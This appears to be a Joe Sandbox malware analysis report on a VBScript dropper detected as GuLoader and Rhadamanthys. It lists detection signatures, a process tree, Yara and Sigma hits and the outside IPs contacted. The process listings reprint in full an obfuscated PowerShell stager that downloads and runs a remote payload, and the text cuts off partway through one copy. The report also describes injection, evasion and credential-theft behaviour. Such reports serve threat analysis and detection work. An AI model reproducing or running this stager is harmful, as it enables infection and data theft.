Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ab.vbs

Overview

General Information

Sample name:ab.vbs
Analysis ID:1568996
MD5:d7782420dddbd95fd746c9e59fb24523
SHA1:481eda9f024eee0a42eee72e423a8c88eee219fe
SHA256:50277ebb2a5a87057ad1198b5432e76a8c0115c6dcb485cc1a2060e420f1b3be
Tags:Listofrequireditemsvbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Msiexec Initiated Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7496 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 7568 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8060 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6920 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 1448 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 7624 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 7496 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 2332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2460,i,18042430906892468815,13956811968867216056,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 6752 cmdline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/0da50779" MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2140,i,8472983126919404237,17192914109164823712,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • wmplayer.exe (PID: 2756 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
            • dllhost.exe (PID: 5964 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • svchost.exe (PID: 1180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000003.1943543611.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000E.00000003.2172788749.0000024F6AAC9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000003.2195173707.0000024F6AACB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000D.00000003.1946474653.00000000054A0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.3.svchost.exe.54a0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              9.3.msiexec.exe.23b10000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                13.3.svchost.exe.56c0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  13.3.svchost.exe.56c0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    9.3.msiexec.exe.238f0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_7696.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_8060.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xbccb:$b2: ::FromBase64String(
                        • 0xad66:$s1: -join
                        • 0x4512:$s4: +=
                        • 0x45d4:$s4: +=
                        • 0x87fb:$s4: +=
                        • 0xa918:$s4: +=
                        • 0xac02:$s4: +=
                        • 0xad48:$s4: +=
                        • 0x14c52:$s4: +=
                        • 0x14cd2:$s4: +=
                        • 0x14d98:$s4: +=
                        • 0x14e18:$s4: +=
                        • 0x14fee:$s4: +=
                        • 0x15072:$s4: +=
                        • 0xb56f:$e4: Get-WmiObject
                        • 0xb75e:$e4: Get-Process
                        • 0xb7b6:$e4: Start-Process
                        • 0x158df:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7624, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", ProcessId: 7496, ProcessName: wscript.exe
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 5964, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49973
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6920, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49831
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6920, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1448, ProcessName: svchost.exe
                        Sigma detected: Use Short Name Path in Command Line
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1", CommandLine: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1", CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\svchost.exe", ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 7624, ParentProcessName: svchost.exe, ProcessCommandLine: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1", ProcessId: 7496, ProcessName: chrome.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7624, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs", ProcessId: 7496, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes 